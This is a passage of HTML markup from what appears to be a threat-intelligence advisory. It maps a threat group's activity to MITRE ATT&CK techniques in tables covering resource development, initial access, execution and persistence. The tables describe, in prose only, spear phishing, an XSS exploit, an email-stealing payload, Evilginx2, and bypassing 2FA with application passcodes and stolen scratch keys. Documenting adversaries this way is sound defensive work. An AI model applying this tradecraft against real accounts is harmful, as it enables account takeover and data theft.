&lt;p&gt;Search Open Technical Databases: Scan Databases&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1596/005/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1596.005&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Various public datasets can provide information to support discovery of exploitable targets.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Search Closed Sources&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1597/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1597&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Previously exfiltrated data can be used to enhance target development efforts.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Search Closed Sources: Purchase Technical Data&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1597/002/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1597.002&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Commercial datasets can also be used to support target development efforts.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;TableContainer Ltr SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;WACAltTextDescribedBy SCXW76044448 BCX8&quot;&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table10&quot;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 10: Resource Development&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Acquire Infrastructure&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1583/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1583&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;This group used Mullvad VPN to anonymize traffic sent to operational infrastructure.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Acquire Infrastructure: Virtual Private Server&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1583/003/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1583.003&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;This group procured VPS servers from a variety of vendors.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Develop Capabilities&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1587/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1587&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;The &lt;em&gt;Ulej&lt;/em&gt; capability was developed likely for use by this group to conduct spear phishing campaigns.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Develop Capabilities: Malware&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1587/001/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1587.001&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Development of a novel payload that steals a victim’s emails and other sensitive account information.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Develop Capabilities: Exploits&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1587/004/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1587.004&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Development of a novel, at the time, cross-site-scripting (XSS) exploit that enables execution of arbitrary JavaScript.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Obtain Capabilities: Tool&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1588/002/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1588.002&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Open source tools, such as Evilginx2, have also been used by the group.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Obtain Capabilities: Artificial Intelligence&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1588/007/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1588.007&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;The group appears to have leveraged AI to support development efforts.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Stage Capabilities&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1608/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1608&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Flowerbed is deployed to a procured server in the cloud.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;TableContainer Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table11&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 11: Initial Access&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Valid Accounts&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1078/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1078&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;This actor has used commercial datasets to acquire account credentials and gain unauthorized access to accounts. Additionally, this actor is believed to use previously compromised accounts to conduct spear phishing.&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Trusted Relationship&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1199/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1199&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;The group sends malicious payloads to targeted individuals using previously compromised accounts that might have an established relationship with the target.&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Phishing&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1566/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1566&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;The actors used spear phishing to lure users into opening malicious email.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;TableContainer Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table12&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 12: Execution&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Exploitation for Client Execution&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1203/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1203&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;An XSS vulnerability was leveraged to execute the JavaScript payload.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;TableContainer Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table13&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 13: Persistence&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Technique Title&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;ID&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p class=&quot;text-align-center&quot;&gt;&lt;strong&gt;Use&lt;/strong&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Account Manipulation&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1098/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1098&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Enabling IMAP and Application Passcodes provides persistent access to the compromised account.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Modify Authentication Process: Multi-Factor Authentication&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1556/006/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1556.006&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;Creating Application Passcodes to bypass 2FA and stealing a user’s “Scratch Keys,” which can be used in place of a 2FA token.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW76044448 BCX8&quot;&gt;
&lt;div class=&quot;TableContainer Ltr SCXW76044448 BCX8&quot;&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table14&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 14: Privilege Escalation&amp;nbsp;&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
